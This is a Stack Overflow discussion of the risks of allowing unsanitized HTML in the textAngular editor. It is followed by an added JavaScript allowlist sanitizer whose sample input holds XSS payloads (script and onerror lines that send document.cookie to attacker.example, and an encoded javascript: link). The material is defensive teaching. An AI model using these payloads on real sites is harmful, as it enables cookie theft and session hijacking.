
What's the risk of allowing the user to generate unsanitized HTML? I am using text-angular and want to use:

 ta-unsafe-sanitizer="true"

https://github.com/fraywing/textAngular/issues/233

Now - I imagine 99.9% of the people reading this have no idea what text-angular is, so I am mainly interested in the overall consequences of allowing raw HTML.

VSO
  • It depends on what you're doing with that data. Do you ever show it to other users? – JJJ Nov 16 '15 at 22:54
  • It's for generating reports. Other users can see the reports organization administrators generate. The guys building these reports are organization administrators. For example, it would be a manager overseeing multiple offices. I don't care what they make their users see, as long as it doesn't give them access to restricted backend elements, which I can't imagine it doing. – VSO Nov 16 '15 at 22:55
  • No, but if other users see it there could be malicious JavaScript inserted by a manager. Of course, this does not have to be done voluntarily, but instead also by some virus or an attacker in any way. Basically anything that could go wrong if arbitrary JavaScript is included into a user's browser _could_ theoretically go wrong. – dirkk Nov 16 '15 at 23:04
  • just because you leave your door unlocked doesn't mean you'll get burglarized; a pro can get in through locks, but it makes it easier for a crackhead to mess up your afternoon with less effort... – dandavis Nov 17 '15 at 00:47

1 Answer


Assume that you have a form element with inputs, and the user inserts into the input something like drop table users. If you have weak server code or some service whose security level you have no idea about, you can lose your data. Now, this is one example. There are a lot of ways to do bad things in a similar way.

Another example is to insert into an image's src some URL with query parameters like

 <img src='http://somehackingsite.com/images/lol.png?userIp="some script or other hacking style"' />

AngularJS offers a way to solve it with ngSanitize:

Sanitizes an html string by stripping all potentially dangerous tokens.

The input is sanitized by parsing the HTML into tokens. All safe tokens (from a whitelist) are then serialized back to properly escaped html string. This means that no unsafe input can make it into the returned string.

The whitelist for URL sanitization of attribute values is configured using the functions aHrefSanitizationWhitelist and imgSrcSanitizationWhitelist of $compileProvider.

Dvir
  • But this all just pretend-protection, right? Because I can pass that string directly to the API. – VSO Nov 16 '15 at 23:54
  • Of course. It's only protection from the GUI. But when Angular parses it on your website it can also protect your users. For example, someone succeeds in reaching your server and adds some script to an image element that everyone should see. – Dvir Nov 16 '15 at 23:56
  • Thanks for your reply, I am going to let this run for a bit, but I will definitely come back to accept an answer. – VSO Nov 16 '15 at 23:59
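The mechanism the answer quotes (parse the HTML into tokens, keep only an allowlist of tags and attribute values, serialize back escaped), applied to the question's report scenario, as an added example in plain JavaScript. It is not part of the original post and is not textAngular's or AngularJS's code; the allowlists, the helper names (sanitizeHtml, isSafeUrl, renderReport) and the sample report are assumptions made for this illustration, and the "unsafe" render path is modelled on the question's description of ta-unsafe-sanitizer, not on textAngular's implementation.

```javascript
// Added illustration, not textAngular's or AngularJS's code: an allowlist sanitizer in
// the spirit of the $sanitize description above. Allowlists, helper names and the
// sample report are assumptions made for this example.
const ALLOWED_TAGS = new Set(['p', 'b', 'i', 'strong', 'em', 'ul', 'ol', 'li', 'a', 'img', 'br', 'h1', 'h2', 'h3']);
const VOID_TAGS = new Set(['br', 'img']);
const ALLOWED_ATTRS = { a: new Set(['href', 'title']), img: new Set(['src', 'alt', 'width', 'height']) };
const URL_ATTRS = new Set(['href', 'src']);
// Scheme allowlist, the role aHrefSanitizationWhitelist / imgSrcSanitizationWhitelist play
// in AngularJS. Relative URLs (no scheme) are accepted; javascript:, data:, ... are not.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto', 'ftp']);
const TAG_RE = /<!--[\s\S]*?-->|<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^>]*)>/g;
const ATTR_RE = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", colon: ':' };

// Decode entities before inspecting a value, so "j&#97;vascript:" is seen for what it is.
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] !== '#') return NAMED_ENTITIES[body.toLowerCase()] ?? whole;
    const hex = body[1].toLowerCase() === 'x';
    const code = parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10);
    return code <= 0x10ffff ? String.fromCodePoint(code) : whole;
  });
}
function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}
function isSafeUrl(value) {
  // Browsers skip tabs, newlines and leading controls when reading the scheme, so
  // strip them first or "java\tscript:" gets through.
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(value.replace(/[\u0000-\u0020]/g, ''));
  return m === null || ALLOWED_SCHEMES.has(m[1].toLowerCase());
}
function sanitizeAttrs(tag, raw) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  let out = '';
  ATTR_RE.lastIndex = 0;
  for (let a; (a = ATTR_RE.exec(raw)) !== null;) {
    const key = a[1].toLowerCase();
    const value = decodeEntities(a[2] ?? a[3] ?? a[4] ?? '');
    if (!allowed.has(key)) continue;                        // onerror, style, ... land here
    if (URL_ATTRS.has(key) && !isSafeUrl(value)) continue;  // bad scheme: attribute dropped
    out += ` ${key}="${escapeText(value)}"`;
  }
  return out;
}
function sanitizeHtml(html) {
  let out = '', last = 0, dropUntil = null;
  const open = [];                                          // emitted tags still open
  TAG_RE.lastIndex = 0;
  for (let m; (m = TAG_RE.exec(html)) !== null;) {
    if (dropUntil === null) out += escapeText(decodeEntities(html.slice(last, m.index)));
    last = TAG_RE.lastIndex;
    if (m[1] === undefined) continue;                       // <!-- comment -->: dropped
    const name = m[1].toLowerCase(), isClose = m[0][1] === '/';
    if (dropUntil !== null) {                               // inside <script> or <style>
      if (isClose && name === dropUntil) dropUntil = null;
      continue;
    }
    if (isClose) {                                          // close down to the matching open tag
      if (open.includes(name)) { let t; do { t = open.pop(); out += `</${t}>`; } while (t !== name); }
      continue;
    }
    if (name === 'script' || name === 'style') { dropUntil = name; continue; }
    if (!ALLOWED_TAGS.has(name)) continue;                  // unknown tag dropped, its text kept
    out += `<${name}${sanitizeAttrs(name, m[2])}>`;
    if (!VOID_TAGS.has(name)) open.push(name);
  }
  if (dropUntil === null) out += escapeText(decodeEntities(html.slice(last)));
  while (open.length) out += `</${open.pop()}>`;            // close anything left open
  return out;
}
// The two render paths the question weighs (modelled on its description, not on
// textAngular's code): the unsafe path hands the string to the DOM untouched.
function renderReport(html, { unsafeSanitizer = false } = {}) {
  return unsafeSanitizer ? html : sanitizeHtml(html);
}
// Constructed sample: a manager's report with legitimate markup plus the payloads
// someone who controls that account (or posts to the API directly) would add.
const UNTRUSTED_REPORT = [
  '<h2>Q3 office summary</h2>',
  '<p>Revenue <b>up 12%</b> &amp; costs flat.</p>',
  '<script>fetch("https://attacker.example/steal?c=" + document.cookie)</script>',
  '<img src="x" onerror="fetch(\'https://attacker.example/steal?c=\' + document.cookie)">',
  '<a href="j&#97;vascript:alert(document.domain)">Details</a>',
  '<img src="https://reports.example/chart.png" alt="chart">',
].join('\n');
console.log(renderReport(UNTRUSTED_REPORT, { unsafeSanitizer: true })); // every payload reaches the DOM
console.log(renderReport(UNTRUSTED_REPORT));                             // only allowlisted markup
```

Run it with node. The first print is what every viewer's browser receives when the string goes in raw: the script block, the onerror handler and the entity-encoded javascript: link all execute in the viewer's session with that viewer's cookies, which is the consequence the comments above describe. The second print keeps the headings, paragraph, bold text and the ordinary image and drops the rest. Because the sanitizer runs at render time on whatever comes back from the server, it also covers the case VSO raises of a string submitted to the API without ever passing through the editor; the checks on decoded entities and stripped control characters are what stop the usual encoding tricks against a naive string match.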